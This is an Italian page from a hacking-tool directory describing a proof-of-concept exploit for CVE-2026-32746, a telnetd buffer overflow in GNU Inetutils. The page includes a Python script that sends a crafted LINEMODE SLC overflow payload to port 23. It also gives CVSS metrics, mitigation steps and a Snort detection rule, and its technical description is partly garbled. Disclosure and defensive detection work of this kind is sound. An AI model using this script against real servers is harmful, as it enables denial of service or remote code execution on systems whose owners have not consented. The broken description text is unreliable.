Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-32746 — Proof-of-concept exploit per CVE-2026-32746, una vulnerabilità critica di esecuzione remota di codice in GNU Inetutils telnetd tramite buffer overflow SLC in LINEMODE. Include analisi tecnica, metriche CVSS e indicazioni di mitigazione. | Kitploit
Strumenti/GitHubGitHub/kaleth4/cve-2026-32746
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

Proof-of-concept exploit per CVE-2026-32746, una vulnerabilità critica di esecuzione remota di codice in GNU Inetutils telnetd tramite buffer overflow SLC in LINEMODE. Include analisi tecnica, metriche CVSS e indicazioni di mitigazione.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 Riepilogo Esecutivo

Vulnerabilità Critica | CVSS 9.8 | Esecuzione Remota di Codice! Interessa: GNU Inetutils Telnetd (versioni precedenti alla 2.7) Tipo: OOB Write nel gestore delle sotto-opzioni LINEMODE SLC Vettore di Attacco: Rete (Porta 23) | Nessuna autenticazione richiesta Impatto: RCE con privilegi del processo Telnetd


🎯 📖 Descrizione Tecnica

È stato identificato un overflow del buffer per scrittura fuori dai limiti (OOB Write) nella funzione add_slc del demone di . Questo difetto consente a un attaccante remoto di manipolando le del protocollo Telnet.

telnetd
GNU Inetutils
iniettare codice arbitrario
sotto-opzioni SLC (Set Local Characters)

🔍 Dettagli Chiave

  • Funzione Vulnerabile: add_slc (elaborazione dei caratteri locali).
  • Causa Radice: Mancanza di validazione dei limiti nel buffer interno.
  • Sfruttamento: Invio massivo di sequenze maligne LINEMODE SLC.
  • Requisiti: Nessuno (accesso diretto alla porta 23).

🛠️ 💻 Proof of Concept (PoC)

Un attaccante può sfruttare questa vulnerabilità tramite un payload Telnet maligno che satura il buffer interno:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generato per overflow di add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Ripetizione di 600 volte

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Invio del payload maligno a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload consegnato. Verifica del crash del servizio/RCE...")

⚠️ ¡AVVERTENZA! Questo codice è solo a scopo educativo e di ricerca. Il suo utilizzo su sistemi senza autorizzazione è illegale.


📊 📈 Metriche di Rischio (CVSS 3.1)

MetricaValoreDescrizione
VettoreAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HRemoto, senza autenticazione
Punteggio9.8 (CRITICO) 🔴Alto impatto su riservatezza, integrità e disponibilità
Pubblicazione13 marzo 2026Ultima modifica: 5 maggio 2026

🛡️ 🔒 Mitigazione e Soluzioni

🚀 Soluzione Immediata

✅ Aggiornare GNU Inetutils alla versione corretta (post-2.7).

⚡ Workaround

🔹 Disabilitare telnetd e migrare a SSH (consigliato). 🔹 Bloccare la porta 23 nei firewall perimetrali. 🔹 Configurare IDS/IPS per rilevare sequenze LINEMODE SLC anomale.

🛡️ Configurazione di Sicurezza Aggiuntiva

  • Regole Snort/Suricata:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
  • **
Scarica lo strumento